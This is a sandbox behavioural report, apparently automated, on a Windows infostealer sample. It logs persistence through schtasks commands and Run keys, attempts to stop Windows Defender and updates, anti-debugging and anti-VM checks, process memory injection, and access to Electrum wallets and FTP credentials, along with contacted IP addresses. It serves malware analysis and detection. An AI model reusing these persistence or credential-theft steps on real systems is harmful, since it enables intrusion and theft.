RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2088 CREDAT:145409
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Communicates with host for which no DNS query was performed (3 events)

host	117.18.232.200
host	193.233.132.167
host	193.233.132.62

Allocates execute permission to another process indicative of possible code injection (6 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2796 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2796 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 1168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 1168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2176 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2176 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x0000000000000050	1

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService Feb. 10, 2024, 2:38 p.m.	service_handle: 0x006a94f8 service_name: WinDefend control_code: 1		0	0
ControlService Feb. 10, 2024, 2:38 p.m.	service_handle: 0x006a9a20 service_name: wuauserv control_code: 1		0	0

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 236 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 10, 2024, 2:38 p.m.	class_name: 18467-41 window_name:		0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (5 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131	reg_value	C:\Users\test22\AppData\Local\RageMP131\RageMP131.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131	reg_value	C:\Users\test22\AppData\Local\AdobeUpdaterV131\AdobeUpdaterV131.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (1 event)

file	C:\Users\test22\AppData\Roaming\GHISLER\wcx_ftp.ini

Potential code injection by writing to the memory of another process (27 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: base_address: 0x000000013fe222b0 process_identifier: 2796 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: base_address: 0x000000013fe30d88 process_identifier: 2796 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: I»`#ß?Aÿã base_address: 0x0000000076d81590 process_identifier: 2796 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: :5 base_address: 0x000000013fe30d78 process_identifier: 2796 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: I» ß?Aÿã base_address: 0x0000000076d57a90 process_identifier: 2796 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: :5 base_address: 0x000000013fe30d70 process_identifier: 2796 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: ÏT base_address: 0x000000013fdd0108 process_identifier: 2796 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013fe2aae8 process_identifier: 2796 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: base_address: 0x000000013fe30c78 process_identifier: 2796 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: base_address: 0x000000013fe222b0 process_identifier: 1168 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: base_address: 0x000000013fe30d88 process_identifier: 1168 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: I»`#ß?Aÿã base_address: 0x0000000076d81590 process_identifier: 1168 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: / base_address: 0x000000013fe30d78 process_identifier: 1168 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: I» ß?Aÿã base_address: 0x0000000076d57a90 process_identifier: 1168 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: / base_address: 0x000000013fe30d70 process_identifier: 1168 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: ÏT base_address: 0x000000013fdd0108 process_identifier: 1168 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013fe2aae8 process_identifier: 1168 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: base_address: 0x000000013fe30c78 process_identifier: 1168 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: base_address: 0x000000013fe222b0 process_identifier: 2176 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: base_address: 0x000000013fe30d88 process_identifier: 2176 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: I»`#ß?Aÿã base_address: 0x0000000076d81590 process_identifier: 2176 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: ¬m base_address: 0x000000013fe30d78 process_identifier: 2176 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: I» ß?Aÿã base_address: 0x0000000076d57a90 process_identifier: 2176 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: ¬m base_address: 0x000000013fe30d70 process_identifier: 2176 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: ÏT base_address: 0x000000013fdd0108 process_identifier: 2176 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013fe2aae8 process_identifier: 2176 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 10, 2024, 2:38 p.m.	buffer: base_address: 0x000000013fe30c78 process_identifier: 2176 process_handle: 0x000000000000004c	1	1

Collects information about installed applications (27 events)

Time & API	Arguments	Status
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
